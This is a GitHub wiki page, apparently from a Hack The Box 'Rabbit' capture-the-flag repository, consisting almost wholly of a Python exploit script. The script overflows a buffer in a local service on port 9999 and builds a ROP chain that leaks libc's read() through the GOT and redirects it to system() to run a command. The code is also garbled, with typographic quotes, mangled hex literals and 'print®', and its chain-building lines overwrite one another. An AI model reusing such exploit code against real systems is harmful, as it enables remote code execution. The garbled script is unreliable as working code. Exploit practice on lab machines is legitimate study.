Smashitup - adydawkins/htb-rabbit GitHub Wiki

#!/usr/bin/python
import os, sys, socket
import struct
import requests

#cmd = sys.argv1+"\0"
cmd = ‘ls’

#payload for Option 1: GET request, needs some filler or err – ‘A’ * 4 to be taken off buffer
payload = r’http://localhost:9999/\AAAA’

#Payload for Option 2: CURL
#payload = ’’

#filler – fill buffer with A’s , thought this would be 536 – 4, but turns out to be 535
payload += ‘A’ * (535 – 4)

#overwrite RBX – offset 536
payload += ‘B’ * 8

#overwrite RBP – offset 544
payload += ‘C’ * 8

#fill before start of RSP – offset 568
payload += ‘D’ * 16

#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)
someother = struct.pack(“<I”, 0×000400cf0) #read() call loc
someother += struct.pack(“<I”, 0×000401787) #PPPR
someother += struct.pack(“<I”, 0) #stdin
someother += struct.pack(“<I”, 0×000602e28) #.dynamic addr
someother += struct.pack(“<I”, len(cmd)) #len of cmd

#leak address of read() in randomised libc
someother += struct.pack(“<I”, 0×400c50) #write() call loc
someother += struct.pack(“<I”, 0×000401787) #PPPR
someother += struct.pack(“<I”, 1) #stdout
someother += struct.pack(“<I”, 0×000603088) #read() in GOT
someother += struct.pack(“<I”, 8) #len

#call read@plt to overwrite the ptr stored in GOT
someother = struct.pack(“<I”, 0×000400cf0) #read() call loc
someother += struct.pack(“<I”, 0×000401787) #PPPR
someother += struct.pack(“<I”, 0) #stdin
someother += struct.pack(“<I”, 0×000603088) #read() in GOT
someother += struct.pack(“<I”, 8) #len

#call read@plt with address of system() in libc
someother = struct.pack(“<I”, 0×000400cf0) #read() call loc
someother += ‘FFFFFFFF’ # bogus
someother += struct.pack(“<I”, 0×000602e28) #.dynamic addr system()

#padding – continue filler, writing into RSP
#payload += ‘E’ * 135
payload = payload + someother
payload += ‘E’ * (135 – len(someother))

  1. Payload delivery Option1: requests.get #
    r = requests.get(payload)
    print(r.status_code)
    print(len(payload))
    print®
  1. Payload delivery Option2: system cmd curl #
    #print(“Sending payload of total length {}”.format(len(payload)))
    #system(“/usr/bin/curl -g localhost:9999/\”" +payload + “\”")
⚠️ **GitHub.com Fallback** ⚠️